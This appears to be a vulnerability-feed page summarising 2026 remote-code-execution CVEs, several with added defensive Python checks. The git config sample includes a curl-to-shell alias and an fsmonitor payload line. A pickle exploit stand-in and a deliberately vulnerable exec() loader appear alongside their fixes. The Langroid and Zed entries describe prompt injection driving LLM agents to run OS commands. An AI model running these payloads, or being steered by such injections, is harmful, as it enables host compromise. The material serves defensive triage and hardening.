
RCE

5429 CVEs technique


CVE-2026-47331 HIGH PATCH This Week

Local privilege escalation in Ubuntu Linux 6.8 kernel stems from an AppArmor SAUCE patch that omits proper locking when modifying a linked list, enabling a race condition that can be exploited by an unprivileged local user. Successful exploitation leads to a use-after-free condition with theoretical arbitrary code execution in kernel context. No public exploit identified at time of analysis, and the issue is not present on the CISA KEV list.

RCE Use After Free Memory Corruption Ubuntu
NVD
CVSS 3.1
7.8
CVE-2026-4944 HIGH This Week

Remote code execution in vLLM 0.14.1 occurs because `trust_remote_code=True` is hardcoded inside the NemotronVL and KimiK25 model loaders, silently overriding the operator's explicit `--trust-remote-code=False` safety flag. Any deployment that loads a malicious or compromised HuggingFace repository for these model architectures will execute attacker-controlled Python in the inference process; the vector's UI:R only reflects that an operator has to initiate the model load. No public exploit is identified at time of analysis, but the issue is an incomplete fix for CVE-2025-66448 and CVE-2026-22807, so the regression pattern is already well understood.

RCE Path Traversal
NVD
CVSS 3.0
8.8
CVE-2026-46345 HIGH POC PATCH GHSA This Week

Arbitrary file write in compliance-trestle's `trestle author jinja` command allows a local user supplying a crafted `-o/--output` argument to write files anywhere the invoking user can write, due to missing validation of `../`, `..\`, and absolute paths. Affected versions are 3.12.1 and earlier, and 4.0.0 through 4.0.2; fixes ship in 3.12.2 and 4.0.3. No public exploit was identified at time of analysis, though the GitHub Security Advisory (GHSA-4q5v-7g7x-j79w) includes a full reproducer; CVSS 8.4 reflects high impact on confidentiality, integrity, and availability.

RCE Python Path Traversal Microsoft
NVD GitHub
CVSS 3.1
8.4
CVE-2026-45261 CRITICAL PATCH Act Now

Remote code execution in GitButler desktop application versions prior to 0.19.7 allows attackers to execute arbitrary scripts within the Tauri webview by injecting malicious links into pull request bodies. The flaw activates when a user with forge integration enabled clicks the crafted link, leading to full compromise of the desktop client context. No public exploit identified at time of analysis, though the GitHub Security Advisory GHSA-xpmj-536r-9fc6 publicly documents the issue.

RCE Code Injection Gitbutler
NVD GitHub
CVSS 4.0
9.3
CVE-2026-44463 HIGH PATCH This Week

Arbitrary code execution in the Zed code editor (versions prior to 0.229.0) is possible by abusing its terminal tool permission system, which fails to account for environment-variable prefixes on allowlisted commands. An attacker who can influence what the agent runs (for example via a malicious prompt or repository content) can prepend assignments such as PAGER=/path/to/payload to a permitted command and hijack execution. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

RCE
NVD GitHub
CVSS 3.1
8.6
CVE-2026-44462 MEDIUM PATCH This Month

{var@P} prompt-string operator. Zed's terminal tool system enforces command-prefix allowlists to control what commands can be executed; the bypass exploits an incomplete input validation list (CWE-184) to chain expansions that resolve to arbitrary shell commands while appearing to match an approved prefix. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in CISA KEV, though the RCE-tagged nature and CVSS High confidentiality impact make it a meaningful concern for users relying on Zed's agentic terminal tool permissions.

RCE
NVD GitHub
CVSS 3.1
6.4
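The two Zed entries above describe the same class of allowlist bypass: the permission check decides what a command "is" differently from how the shell will run it. The following is an added example, not Zed's code; the allowlist entries are constructed, and `weak_is_allowed` is a stand-in for the bug class (it skips leading `NAME=value` words to find the program, so `PAGER=/tmp/payload git diff` is judged to be plain `git diff`). The hardened check refuses leading environment assignments and any shell metacharacter, which also covers expansions such as `${var@P}`.

```python
import re
import shlex

# Constructed allowlist of approved command prefixes; Zed's real "always allow"
# configuration is not on this page, these entries are illustrative only.
ALLOWED_PREFIXES = (("git", "status"), ("git", "diff"), ("cargo", "test"))

# A leading word of the form NAME=value is a temporary environment assignment
# in POSIX shells, not an argument of the command that follows it.
_ENV_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
# Characters that trigger expansion, substitution or chaining in a shell.
_SHELL_META = re.compile(r"[$`;|&<>(){}\n]")


def _matches_allowlist(words):
    return any(tuple(words[:len(p)]) == p for p in ALLOWED_PREFIXES)


def weak_is_allowed(command: str) -> bool:
    """Stand-in for the bug class: leading NAME=value words are skipped to
    find the program, so 'PAGER=/tmp/x git diff' is judged to be 'git diff'
    while the shell still honours PAGER when git runs."""
    try:
        words = shlex.split(command)
    except ValueError:
        return False
    while words and _ENV_ASSIGNMENT.match(words[0]):
        words.pop(0)
    return _matches_allowlist(words)


def hardened_is_allowed(command: str) -> bool:
    """Only a literal allowlisted argv passes: no environment assignments, no
    expansions such as ${var@P} or $(...), no operators, and the words must
    match after quoting is resolved."""
    if _SHELL_META.search(command):
        return False
    try:
        words = shlex.split(command)
    except ValueError:            # unbalanced quotes
        return False
    if not words or _ENV_ASSIGNMENT.match(words[0]):
        return False
    return _matches_allowlist(words)
```

Matching on the parsed word list rather than on the raw string is deliberate: `"git" diff` and `git diff` are the same argv, and a check that compared strings would either miss the quoted form or be fooled by it.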
CVE-2026-44465 HIGH PATCH This Week

Remote code execution in Zed code editor versions prior to 0.227.1 occurs when a user opens a folder containing a malicious .git/config file that abuses the core.fsmonitor Git configuration option. The flaw triggers even in untrusted mode, defeating the safety boundary users expect when opening unknown repositories, and no public exploit has been identified at time of analysis though the advisory is published by the vendor.

RCE Command Injection
NVD GitHub
CVSS 3.1
8.6
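A pre-open check for the `core.fsmonitor` case above, written as an added example rather than anything from Zed: it parses a checkout's `.git/config` and reports every key through which git would run a program. The key list is compiled by the editor for this example and is not exhaustive; the sample config is constructed.

```python
import configparser
import os

# Keys through which git executes an external program.  Compiled by the
# editor for this example, not taken from the Zed advisory, and not exhaustive.
_RISKY_KEYS = {
    "core.fsmonitor", "core.hookspath", "core.sshcommand", "core.gitproxy",
    "core.pager", "core.editor", "core.askpass", "diff.external",
    "credential.helper", "gpg.program", "sequence.editor",
    "uploadpack.packobjectshook",
}
# (section, key) pairs that are risky inside a named subsection, e.g. [filter "lfs"].
_RISKY_SUBSECTION_KEYS = {
    ("filter", "clean"), ("filter", "smudge"), ("filter", "process"),
    ("diff", "textconv"), ("diff", "command"), ("merge", "driver"),
    ("gpg", "program"), ("credential", "helper"),
}

# Constructed .git/config of an untrusted checkout.
SAMPLE_CONFIG = """\
[core]
\trepositoryformatversion = 0
\tfilemode = true
\tfsmonitor = /tmp/payload.sh
\thooksPath = .githooks
[remote "origin"]
\turl = https://example.invalid/repo.git
[filter "lfs"]
\tclean = git-lfs clean -- %f
[alias]
\tst = status
\tpwn = !curl http://example.invalid | sh
"""

CLEAN_CONFIG = "[core]\n\trepositoryformatversion = 0\n\tbare = false\n"


def find_risky_git_config(text: str) -> list:
    """Return dotted names of config entries that make git execute a program."""
    cp = configparser.ConfigParser(strict=False, interpolation=None,
                                   delimiters=("=",), allow_no_value=True)
    cp.read_string(text)          # git's INI dialect parses; keys are lowercased
    findings = []
    for section in cp.sections():
        name, _, sub = section.partition(" ")
        name, sub = name.lower(), sub.strip().strip('"')
        for key, value in cp.items(section):
            if sub:
                if (name, key) in _RISKY_SUBSECTION_KEYS:
                    findings.append(f"{name}.{sub}.{key}")
            elif f"{name}.{key}" in _RISKY_KEYS:
                findings.append(f"{name}.{key}")
            elif name == "alias" and value and value.lstrip().startswith("!"):
                findings.append(f"{name}.{key}")    # shell alias
    return findings


def is_safe_to_open(repo_dir: str) -> bool:
    """Gate an untrusted checkout before an editor or agent touches it."""
    path = os.path.join(repo_dir, ".git", "config")
    if not os.path.isfile(path):
        return True
    with open(path, encoding="utf-8", errors="replace") as fh:
        return not find_risky_git_config(fh.read())
```

The scan is a triage aid, not a substitute for the vendor fix: git also reads `.gitattributes`, hooks and include directives, so a clean `.git/config` does not prove a checkout is inert.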
CVE-2026-9828 LOW Monitor

Security restriction bypass in logback-core's HardenedObjectInputStream allows limited object injection via logback's SimpleSocketServer and SimpleSSLSocketServer components, affecting all versions through 1.5.32 inclusive. An attacker who can influence serialized data submitted to these socket server endpoints can instantiate objects from java.lang and java.util classes not explicitly blocked by the hardened deserializer, circumventing its intended allowlist controls. The vendor and NVD both confirm no practical remote code execution or significant privilege escalation has been identified; the real-world impact is limited confidentiality and integrity exposure. No public exploit has been identified at time of analysis; the E:P component of the CVSS vector indicates proof-of-concept maturity only. Not listed in CISA KEV.

RCE Deserialization
NVD
CVSS 4.0
1.2
CVE-2026-37579 Awaiting Data

An issue in SMSGate sms-core<=2.1.13.6 allows a remote attacker to execute arbitrary code via the Cmpp7FDeliverRequestMessageCodec.java component

RCE Java
NVD GitHub
CVE-2026-37266 HIGH This Week

Remote code execution in Responsive FileManager 9.14.0 enables authenticated attackers to run arbitrary code on the underlying server by abusing the force_download.php component. The CWE-98 classification points to improper control of PHP file inclusion, and while no public exploit is identified at time of analysis, the high CVSS of 8.0 reflects full confidentiality, integrity, and availability impact once a target user interacts with the attacker-supplied input.

PHP RCE LFI
NVD
CVSS 3.1
8.0
CVE-2026-46218 PATCH Awaiting Data

{get,set}_value The uvd/vce/vcn code accesses the IB at predefined offsets without checking that the IB is large enough. Check the bounds here. The caller is responsible for making sure it can handle arbitrary return values. Also make the idx a uint32_t to prevent overflows causing the condition to fail.

RCE Linux
NVD
EPSS
0.0%
CVE-2026-9227 HIGH This Week

Arbitrary file upload leading to remote code execution affects the GutenBee – Gutenberg Blocks WordPress plugin in all versions through 2.20.1, enabling authenticated users with Author role or higher to upload PHP files disguised with double extensions such as shell.json.php. The flaw stems from a permissive strpos() substring check in gutenbee_file_and_ext_json that allows attackers to bypass WordPress filetype validation and execute arbitrary PHP on the server. No public exploit is identified at time of analysis, and the issue is not listed in CISA KEV.

PHP WordPress RCE File Upload
NVD GitHub
CVSS 3.1
8.8
EPSS
0.1%
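The GutenBee check fails because a substring test answers "does the name contain `.json`" rather than "is the final extension `.json`". Added example, not the plugin's code: the `strpos()` behaviour is modelled in Python, and the executable-extension list is compiled for this example. The fixed check also refuses `shell.php.json`, since Apache's mod_mime evaluates every dotted segment, not only the last one.

```python
import json
import os

# Extensions a web server may execute; compiled for this example, not from the plugin.
EXECUTABLE_EXTS = {"php", "phtml", "php3", "php4", "php5", "php7", "phps",
                   "phar", "pht", "shtml", "cgi", "pl", "py"}


def vulnerable_is_json(filename: str) -> bool:
    """Mirrors a strpos()-style substring test: true when '.json' appears anywhere."""
    return ".json" in filename.lower()


def fixed_is_json(filename: str) -> bool:
    """The last extension must be .json and no earlier dotted segment may be
    something a server could execute, so both 'shell.json.php' and
    'shell.php.json' are refused while 'data.v2.json' is accepted."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2 or parts[-1] != "json" or not parts[0]:
        return False
    return not any(seg in EXECUTABLE_EXTS for seg in parts[1:-1])


def accept_json_upload(filename: str, data: bytes) -> bool:
    """Name check plus content check: the body has to parse as JSON."""
    if not fixed_is_json(filename):
        return False
    try:
        json.loads(data.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return False
    return True
```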
CVE-2026-9009 HIGH This Week

Remote code execution in the Crawlomatic Multipage Scraper Post Generator plugin for WordPress (versions up to and including 2.7.2) allows authenticated users with author-level privileges to execute arbitrary PHP code on the server by abusing the 'callback_raw' or 'callback' shortcode attributes processed by the filter_content function. The flaw stems from passing attacker-controlled input directly to call_user_func() guarded only by is_callable(), which still permits dangerous PHP built-ins like system, shell_exec, exec, passthru, and assert. No public exploit identified at time of analysis, but Wordfence has published a detailed advisory and the shortcode sink is trivially reachable for any author-level account.

PHP WordPress RCE File Upload
NVD VulDB
CVSS 3.1
8.8
EPSS
0.2%
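The Crawlomatic sink is the general "dynamic callback guarded by is_callable" anti-pattern. Added example, not the plugin's code, in Python rather than PHP: `vulnerable_apply` resolves any dotted name and calls it if `callable()` says yes, which is exactly the guard the advisory describes; `hardened_apply` selects from a closed table, so the attacker-controlled string never names code. The `SAFE_CALLBACKS` table is constructed.

```python
import html
import importlib


def _resolve(dotted: str):
    """Look up a function by name the way a dynamic dispatcher might."""
    module_name, _, attr = dotted.rpartition(".")
    try:
        module = importlib.import_module(module_name or "builtins")
    except ImportError:
        return None
    return getattr(module, attr, None)


def vulnerable_apply(callback: str, value: str):
    """Stand-in for call_user_func($cb, $v) guarded only by is_callable($cb):
    any resolvable name is accepted, so the caller chooses the function."""
    fn = _resolve(callback)
    if not callable(fn):
        raise ValueError(f"{callback!r} is not callable")
    return fn(value)


# Explicit table of the transforms the feature is meant to offer (constructed).
SAFE_CALLBACKS = {
    "strip": str.strip,
    "upper": str.upper,
    "escape_html": html.escape,
}


def is_permitted(callback: str) -> bool:
    return callback in SAFE_CALLBACKS


def hardened_apply(callback: str, value: str) -> str:
    """The name selects an entry in a closed table; it never names code."""
    if not is_permitted(callback):
        raise ValueError(f"callback {callback!r} not permitted")
    return SAFE_CALLBACKS[callback](value)
```

A denylist of `system`, `exec` and friends is not an acceptable alternative to the table: PHP and Python both offer many other routes to code execution (`eval`, `assert`, `call_user_func` itself, `__import__`), and the list is never complete.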
CVE-2026-32999 CRITICAL PATCH Act Now

Remote code execution in Comet Backup server allows a tenant administrator to inject arbitrary code into the backup agent signing module via insufficient character filtering, ultimately running code with elevated privileges on the Comet server and on connected backup agent devices. The vendor advisory links the issue to the branding configuration path, and no public exploit has been identified at time of analysis. Combined with a Scope:Changed CVSS:3.1 score of 9.0, successful exploitation pivots from a single tenant context into the underlying server and downstream endpoints.

RCE Code Injection
NVD VulDB
CVSS 3.1
9.0
EPSS
0.0%
CVE-2026-32998 CRITICAL Act Now

Remote code execution in Veeam Service Provider Console versions 9.0 through 9.2 allows authenticated remote attackers to execute arbitrary code on the server, per the CVSS 4.0 vector requiring low privileges (PR:L) over the network. With a CVSS score of 9.4 and a scope change indicating impact beyond the vulnerable component (SC:H/SI:H/SA:H), successful exploitation could compromise managed downstream customer environments. No public exploit identified at time of analysis, and the CVE is not listed in CISA KEV.

RCE Service Provider Console
NVD VulDB
CVSS 4.0
9.4
EPSS
0.3%
CVE-2026-30761 Awaiting Data

An arbitrary file upload vulnerability in the pages/admin.uploadmapimg.php component of SourceBans Material Admin v1.1.6 allows attackers to execute arbitrary code via uploading a crafted image file.

PHP RCE File Upload N A
NVD GitHub
CVE-2026-45725 PyPI HIGH PATCH GHSA This Week

Arbitrary file write in the compliance-trestle Python library (versions 4.0.0-4.0.2 and any release below 3.12.2) lets an attacker who controls a referenced OSCAL artifact plant attacker-supplied content anywhere the trestle process can write. The HTTPSFetcher and SFTPFetcher cache layer builds the local cache file path directly from the URL path component, so when trestle imports a remote OSCAL profile whose href contains `../` traversal the fetched HTTP/SFTP response body escapes the .trestle cache directory; overwriting files such as /etc/cron.d entries, ~/.ssh/authorized_keys, or a module on sys.path turns the primitive into code execution. A reproducible public proof-of-concept exists in the GHSA advisory (GHSA-g3vg-vx23-3858); the flaw is not listed in CISA KEV and no CVSS or EPSS scoring is provided, but the maintainers have shipped fixes in 4.0.3 and 3.12.2.

RCE Python Path Traversal IBM Nginx
NVD GitHub
CVE-2026-46621 Maven CRITICAL PATCH GHSA Act Now

Remote code execution in Yamcs (the open-source mission control framework, yamcs-core) before 5.12.7 lets an authenticated operator holding the ChangeMissionDatabase privilege overwrite a Python (Jython) algorithm via the Mission Database REST API and run arbitrary OS commands on the host. The Jython script engine is invoked without a sandbox, so injected algorithm text can import java.lang.Runtime and shell out. Publicly available exploit code exists (a full PoC is published in the GitHub Security Advisory), but the issue is not listed in CISA KEV and no public in-the-wild exploitation is identified.

RCE Python Java Command Injection Code Injection
NVD GitHub
CVSS 3.1
9.1
CVE-2026-46562 Maven CRITICAL PATCH GHSA Act Now

Remote code execution in the Yamcs mission control framework (org.yamcs:yamcs-core, releases 4.7.3 through 5.12.6) lets a caller of the algorithm-override endpoint run arbitrary Java/OS code on the ground server. The Nashorn JavaScript engine that evaluates user-supplied algorithm text is created without a ClassFilter, so payloads can reach any Java class (e.g. java.lang.Runtime) and execute commands as the Yamcs process user; because the default install (no security.yaml) gives the built-in guest user superuser=true, the endpoint is reachable by an unauthenticated network attacker. A detailed working exploit is published in the GitHub Security Advisory (publicly available exploit code exists); the issue is not listed in CISA KEV and no EPSS score was provided in the input.

RCE Python Java Code Injection
NVD GitHub
CVSS 3.1
9.8
CVE-2026-45077 PHP HIGH PATCH GHSA This Week

Unauthenticated PHP object deserialization affects Symfony's Monolog Bridge through the development-time `server:log` console command, which by default binds a TCP listener to 0.0.0.0:9911 and runs `unserialize(base64_decode())` on every received frame with no class allowlist, authentication, or integrity check. Any host that can reach port 9911 on a machine running `server:log` can submit attacker-controlled serialized payloads, producing at minimum an unauthenticated denial of service (a non-array value triggers a fatal type error) and potentially object injection or full remote code execution where usable gadget chains exist in the target's autoloaded classes. Affected versions are symfony/symfony and symfony/monolog-bridge below 5.4.52, 6.x below 6.4.40, and 7.x below 7.4.12; there is no public exploit identified at time of analysis and no CVSS, EPSS, or CISA KEV data is available.

PHP RCE Denial Of Service Deserialization
NVD GitHub
CVE-2026-9208 HIGH PATCH This Week

Unauthorized OS command execution in Tanium Connect allows an attacker holding low-privilege authenticated access to run arbitrary commands on the host, achieving full compromise of confidentiality, integrity, and availability. The CVSS 8.8 (network vector, low complexity, low privileges, no user interaction) reflects an authenticated remote code execution issue rooted in command injection (CWE-78). No public exploit has been identified at time of analysis and the vulnerability is not listed in CISA KEV; EPSS data was not provided.

RCE Command Injection
NVD
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-47243 Go PATCH GHSA Awaiting Data

Pre-NVD disclosure via the oss-security mailing list (2026/05/21): "CVE-2026-47243: Kata Containers runtime-rs 3.30: virtiofsd symlink escape" (posted by Aurelien Bombo).

RCE Linux
NVD
CVE-2026-25879 PyPI CRITICAL PATCH GHSA Act Now

Remote code execution in Langroid before 0.63.0 arises because its SQLChatAgent executes SQL text generated by an LLM, and that LLM is steerable through prompt injection — including indirect injection via data returned from the database into the model's context. When the agent connects with a database role holding code-execution or filesystem privileges, an attacker who shapes the agent's input can drive emission of dialect-specific primitives like PostgreSQL's COPY ... FROM PROGRAM to run OS commands on the database host. A full working proof-of-concept (Base64-smuggled COPY FROM PROGRAM running 'id') is published in the GitHub advisory; there is no entry in CISA KEV, so this reflects publicly available exploit code rather than confirmed active exploitation.

RCE Python Information Disclosure SQLi PostgreSQL
NVD GitHub
CVSS 3.1
9.8
CVE-2026-44887 CRITICAL PATCH Act Now

Unauthenticated remote code execution affects Pi.Alert, an open-source WiFi/LAN intruder detector with web-based service monitoring, in all versions prior to the 2026-05-07 release. The web configuration editor writes attacker-controlled content into pialert.conf, which the background scan daemon subsequently evaluates with Python's exec(), so injected statements run with the daemon's privileges. Because the product ships with web protection disabled by default, an attacker reaching the web interface needs no credentials, yielding a CVSS 9.8 critical flaw; no public exploit identified at time of analysis.

RCE Python Code Injection
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.2%
CVE-2026-44888 CRITICAL PATCH Act Now

Unauthenticated remote code execution affects Pi.Alert, a Python-based Wi-Fi/LAN intruder detector, in all releases prior to the 2026-05-07 fix. The web UI's SaveConfigFile() endpoint writes attacker-supplied numeric configuration values such as SMTP_PORT into pialert.conf with no validation, and because that file is reloaded via Python's exec() by a background cron job every 3-5 minutes, injected Python executes at the OS level. On default installations (PIALERT_WEB_PROTECTION = False) no credentials are required, matching the CVSS 9.8 network/no-privilege rating; there is no public exploit identified at time of analysis and the CVE is not in CISA KEV, but trivial complexity and full CIA impact make it a high-priority patch.

RCE Python Code Injection
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.0%
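Both Pi.Alert entries describe one mechanism: a web form value is interpolated into a Python-syntax settings file that a daemon later feeds to `exec()`. The following is an added example, not Pi.Alert's code; `SCHEMA` is a constructed stand-in for the real settings list. The vulnerable pair shows the injection landing in the loader's namespace; the hardened pair validates by type at write time, emits strings through `repr()`, and reads the file back with `ast.literal_eval` so that nothing in it can ever execute.

```python
import ast
import re

# Constructed schema for the few settings used here; Pi.Alert's real
# settings list is not on this page.
SCHEMA = {"SMTP_PORT": int, "SMTP_SERVER": str, "REPORT_MAIL": bool}
_KEY_RE = re.compile(r"^[A-Z][A-Z0-9_]*$")


def write_config_vulnerable(settings: dict) -> str:
    """Interpolates raw form values into Python source, the pattern the CVE describes."""
    return "".join(f"{key} = {value}\n" for key, value in settings.items())


def load_config_vulnerable(text: str) -> dict:
    """exec()s the file; whatever the writer let through now runs as the daemon."""
    ns: dict = {}
    exec(text, ns)
    return {k: v for k, v in ns.items() if not k.startswith("__")}


def normalize_setting(key: str, value):
    """Coerce a form value to the schema type or raise ValueError."""
    if key not in SCHEMA:
        raise ValueError(f"unknown setting {key!r}")
    kind = SCHEMA[key]
    if kind is int:
        n = int(str(value).strip())     # int() refuses '25\nimport os'
        if not 1 <= n <= 65535:
            raise ValueError(f"{key} out of range")
        return n
    if kind is bool:
        s = str(value).strip().lower()
        if s not in ("true", "false"):
            raise ValueError(f"{key} must be true/false")
        return s == "true"
    return str(value)


def is_valid_setting(key: str, value) -> bool:
    try:
        normalize_setting(key, value)
        return True
    except ValueError:
        return False


def write_config_hardened(settings: dict) -> str:
    """Validated values, emitted with repr() so strings can never break out."""
    return "".join(f"{k} = {normalize_setting(k, v)!r}\n" for k, v in settings.items())


def load_config_hardened(text: str) -> dict:
    """Parse KEY = <literal> lines with ast.literal_eval: no exec, no imports."""
    result = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        key, sep, rhs = line.partition("=")
        key = key.strip()
        if not sep or not _KEY_RE.match(key) or key not in SCHEMA:
            raise ValueError(f"line {lineno}: bad key")
        try:
            value = ast.literal_eval(rhs.strip())
        except (ValueError, SyntaxError):
            raise ValueError(f"line {lineno}: not a literal") from None
        if type(value) is not SCHEMA[key]:
            raise ValueError(f"line {lineno}: wrong type for {key}")
        result[key] = value
    return result


def is_valid_config(text: str) -> bool:
    try:
        load_config_hardened(text)
        return True
    except ValueError:
        return False
```

Note that the hardened loader refuses a file the vulnerable writer produced even if the writer is patched later, which is the property you want: the daemon side must not trust the file just because the web side was supposed to validate it.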
CVE-2026-47161 HIGH This Week

Remote code execution in RELATE LMS (the inducer/relate web courseware platform) stems from its Celery task queue being configured to accept and unpickle untrusted messages (CELERY_ACCEPT_CONTENT included "pickle"). Because the code-execution sandbox lacks network isolation, an authenticated student can reach the message broker and deliver a malicious pickle payload that the worker deserializes, yielding arbitrary command execution on the host. No public exploit identified at time of analysis; the issue is corrected in commit d66ba5659b459bf1ba56b7109b5f9ecf197cbefb.

RCE Deserialization
NVD GitHub
CVSS 4.0
8.7
EPSS
0.5%
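The RELATE entry is the classic pickle-over-broker case. Added example, not RELATE's code: a `__reduce__` payload that calls `builtins.eval` stands in for `os.system("id")`, `unsafe_loads` shows what a worker that accepts pickle does with it, and `RestrictedUnpickler` refuses every global lookup not on an (here empty) allowlist, so plain task data still round-trips while the payload is rejected. The task message is constructed. For Celery specifically, the configuration-level fix is `accept_content = ["json"]`, which is also Celery's default.

```python
import io
import pickle


class _Exploit:
    """Pickles to a call of builtins.eval; stands in for os.system('id')."""
    def __reduce__(self):
        return (eval, ("6 * 7",))


def build_exploit_payload() -> bytes:
    return pickle.dumps(_Exploit())


def build_task_payload() -> bytes:
    """Constructed legitimate task message: plain data only."""
    return pickle.dumps({"task": "grade", "submission_id": 42, "args": [1, 2]})


def unsafe_loads(data: bytes):
    """What a worker with 'pickle' in accept_content does with a message."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every GLOBAL/STACK_GLOBAL lookup that is not explicitly allowed.
    With an empty allowlist only scalars and the builtin containers deserialize;
    those are built from opcodes and never go through find_class."""
    ALLOWED = frozenset()   # e.g. {("datetime", "datetime")} if really needed

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_safe_payload(data: bytes) -> bool:
    try:
        restricted_loads(data)
        return True
    except pickle.UnpicklingError:
        return False
```

A restricted unpickler is a mitigation for code you cannot change; where you control both ends, switch the serializer to JSON and put the broker on a network the sandbox cannot reach, which is the isolation the advisory says was missing.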
CVE-2025-69600 HIGH This Week

Local privilege escalation via command injection in Raynet rvia (RayVentory) 12.6.4392.49-amd64.deb allows authenticated local users to achieve arbitrary code execution by exploiting an improperly terminated find query the application uses to locate the Java runtime. The flaw is reachable through the getconfig command, the upload URL argument, and the oracle -o flag, and publicly available exploit code exists on GitHub although no active exploitation has been observed.

RCE Java Command Injection Oracle
NVD GitHub
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-38945 HIGH This Week

Local arbitrary code execution in Raynet rvia 12.6 Update 8 and earlier lets a low-privileged local user inject operating-system commands through the application's Java search feature, which assembles a `find` command from an attacker-controlled path without properly terminating the search criteria (CWE-77 OS command injection). A working proof-of-concept exploit script is publicly available on GitHub (Wise-Security/CVE-2026-38945), and CISA's SSVC framework rates the technical impact as total, though it marks the issue as not automatable and requiring local access. No EPSS score and no CISA KEV listing were supplied, so there is no public exploit identified as actively exploited at time of analysis.

RCE Java Command Injection
NVD GitHub
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-45162 PHP HIGH PATCH GHSA This Week

PHP object injection in Pimcore (packages pimcore/pimcore and admin-ui-classic-bundle) up to and including version 12.3.6 arises from six code paths calling unserialize() without the allowed_classes restriction on values read from database columns and filesystem files. An attacker who can already write to one of those sources - for example through SQL injection into the tmp_store, sites, or custom_layouts tables, or a file write to the WebDAV delete log - can plant a serialized PHP gadget chain that executes arbitrary code with web-server privileges once the data is deserialized. No public exploit identified at time of analysis (the vendor advisory documents only a conceptual PoC procedure), the CVE is not in CISA KEV, and EPSS is not provided; the issue is fixed in 12.3.7 and rated CVSS 8.0, with the High attack-complexity reflecting its dependence on a separate write primitive and a working gadget chain.

PHP RCE SQLi Deserialization
NVD GitHub
CVSS 3.1
8.0
CVE-2026-48922 HIGH This Week

Arbitrary file write in the Jenkins Credentials Binding Plugin (version 720.v3f6decef43ea_ and earlier) lets users who can supply file or zip-file credentials to a job write files to attacker-chosen paths on the node filesystem, escalating to remote code execution when Jenkins is configured to let a low-privileged user configure such credentials for a job running on the built-in node. The flaw stems from missing file-name sanitization on the file and zip credential types. Rated CVSS 7.5 with high attack complexity (AC:H); no public exploit identified at time of analysis and the issue is not in CISA KEV.

RCE Jenkins
NVD
CVSS 3.1
7.5
EPSS
0.2%
CVE-2026-37713 HIGH This Week

Remote code execution in Dolibarr ERP/CRM versions 22.0.0 through 22.0.4 and 24.0.0-alpha allows network-based attackers to execute arbitrary PHP code via the commonobject.class.php component. The CVSS 7.3 (AV:N/AC:L/PR:N/UI:N) vector indicates no authentication or user interaction is required, though impact metrics are rated Low across CIA. No public exploit identified at time of analysis, and EPSS scoring is very low at 0.06% (18th percentile) despite the unauthenticated network attack surface.

PHP RCE Code Injection
NVD GitHub
CVSS 3.1
7.3
EPSS
0.1%
CVE-2026-37712 HIGH This Week

Remote code execution in Dolibarr ERP/CRM versions 22.0.0 through 22.0.4 and 24.0.0-alpha stems from unsafe use of PHP's call_user_func_array() within the cron job class, enabling attackers to execute arbitrary PHP code on the application server. The vulnerability carries CVSS 7.3 with CWE-94 (Code Injection) classification, and while no public exploit is identified at time of analysis, a security researcher writeup referenced from NVD discusses a five-year history of related dol_eval issues in Dolibarr suggesting recurring weaknesses in this code area. EPSS probability is very low at 0.06% and SSVC reports no observed exploitation, but the issue is rated automatable with partial technical impact.

PHP RCE Code Injection
NVD GitHub
CVSS 3.1
7.3
EPSS
0.1%
CVE-2026-37711 HIGH This Week

Code injection in Dolibarr ERP/CRM versions 22.0.0 through 22.0.4 and 24.0.0-alpha allows a remote, unauthenticated attacker to execute attacker-controlled PHP through the htdocs/core/actions_addupdatedelete.inc.php request handler (CWE-94). The CVSS vector (AV:N/AC:L/PR:N/UI:N) indicates a low-effort, network-reachable, no-authentication attack, though all impact metrics are rated Low (C:L/I:L/A:L), suggesting the executable surface is constrained rather than full system takeover. There is no public exploit code confirmed in the provided data and the issue is not in CISA KEV (no observed exploitation per SSVC), but a referenced research write-up and a GitHub Security Advisory exist, and SSVC rates the flaw as automatable.

PHP RCE Code Injection
NVD GitHub
CVSS 3.1
7.3
EPSS
0.2%
CVE-2026-8179 HIGH This Week

Arbitrary code execution in IBM Aspera High-Speed Transfer Server and Endpoint (versions 3.7.4 through 4.4.7 Fix Pack 1) arises from a stack-based buffer overflow in the asperahttpd component. An authenticated user with network access can corrupt memory in this HTTP handling component to run code in the context of the service, fully compromising confidentiality, integrity, and availability (CVSS 8.8). No public exploit has been identified at time of analysis, and the CVE is not listed in CISA KEV; EPSS data was not provided.

RCE Buffer Overflow IBM Stack Overflow
NVD
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-8175 CRITICAL Act Now

Remote code execution and authentication bypass are possible in IBM Aspera High-Speed Transfer Server and High-Speed Transfer Endpoint (versions 3.7.4 through 4.4.7 Fix Pack 1) through a heap-based buffer overflow in the asperahttpd component. An unauthenticated network attacker can corrupt memory to crash the service (denial of service) and, in the worst case, hijack execution flow to run arbitrary code or bypass authentication. There is no public exploit identified at time of analysis and SSVC lists exploitation as none, but the CVSS 9.8 rating and 'Automatable: yes' assessment mark this as a high-priority patching target.

Authentication Bypass RCE Buffer Overflow Denial Of Service Heap Overflow +1
NVD
CVSS 3.1
9.8
EPSS
0.4%
CVE-2026-7524 CRITICAL Act Now

Remote code execution in IBM Langflow OSS versions 1.0.0 through 1.9.1 lets unauthenticated network attackers run arbitrary code by abusing how the platform handles symbolic links while unpacking uploaded archives. Because extraction does not properly validate symlink targets, a crafted archive can write files outside the intended directory and ultimately achieve code execution on the host. The flaw carries a critical CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) and is reachable without authentication or user interaction, though no public exploit identified at time of analysis.

RCE Path Traversal IBM
NVD
CVSS 3.1
9.8
EPSS
0.3%
